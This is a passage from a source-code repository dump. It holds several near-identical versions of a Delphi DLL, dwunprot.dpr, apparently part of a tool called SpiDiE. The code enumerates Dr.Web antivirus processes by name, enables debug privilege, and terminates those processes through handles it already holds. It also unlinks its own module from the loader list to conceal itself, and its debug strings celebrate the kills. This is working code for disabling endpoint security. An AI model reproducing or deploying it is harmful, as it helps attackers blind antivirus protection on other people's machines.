PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | uitohexW(ProcessHandles[i], strendW(buf1)); 168 | OutputDebugStringW(buf1); 169 | 170 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 171 | OutputDebugStringW(#20'Gone to hell successfully') 172 | else 173 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 174 | ZwClose(ProcessHandles[i]); 175 | end; 176 | 177 | ZwSetEvent(EventHandle, nil); 178 | ZwClose(EventHandle); 179 | end; 180 | end; 181 | end; 182 | 183 | asm 184 | call main 185 | xor eax, eax 186 | inc eax 187 | retn $000c 188 | end. 189 | 190 | 191 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.5 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | uitohexW(ProcessHandles[i], strendW(buf1)); 168 | OutputDebugStringW(buf1); 169 | 170 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 171 | OutputDebugStringW(#20'Gone to hell successfully') 172 | else 173 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 174 | ZwClose(ProcessHandles[i]); 175 | end; 176 | 177 | ZwSetEvent(EventHandle, nil); 178 | ZwClose(EventHandle); 179 | end; 180 | end; 181 | end; 182 | 183 | asm 184 | call main 185 | xor eax, eax 186 | inc eax 187 | retn $000c 188 | end. 189 | 190 | 191 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.6 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | uitohexW(ProcessHandles[i], strendW(buf1)); 168 | OutputDebugStringW(buf1); 169 | 170 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 171 | OutputDebugStringW(#20'Gone to hell successfully') 172 | else 173 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 174 | ZwClose(ProcessHandles[i]); 175 | end; 176 | 177 | ZwSetEvent(EventHandle, nil); 178 | ZwClose(EventHandle); 179 | end; 180 | end; 181 | end; 182 | 183 | asm 184 | call main 185 | xor eax, eax 186 | inc eax 187 | retn $000c 188 | end. 189 | 190 | 191 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | 168 | uitohexW(ProcessHandles[i], strendW(buf1)); 169 | OutputDebugStringW(buf1); 170 | 171 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 172 | OutputDebugStringW('Gone to hell successfully') 173 | else 174 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 175 | 176 | ZwClose(ProcessHandles[i]); 177 | end; 178 | 179 | ZwSetEvent(EventHandle, nil); 180 | ZwClose(EventHandle); 181 | end; 182 | end; 183 | end; 184 | 185 | asm 186 | call main 187 | xor eax, eax 188 | inc eax 189 | retn $000c 190 | end. 191 | 192 | 193 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.1 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | 168 | uitohexW(ProcessHandles[i], strendW(buf1)); 169 | OutputDebugStringW(buf1); 170 | 171 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 172 | OutputDebugStringW('Gone to hell successfully') 173 | else 174 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 175 | 176 | ZwClose(ProcessHandles[i]); 177 | end; 178 | 179 | ZwSetEvent(EventHandle, nil); 180 | ZwClose(EventHandle); 181 | end; 182 | end; 183 | end; 184 | 185 | asm 186 | call main 187 | 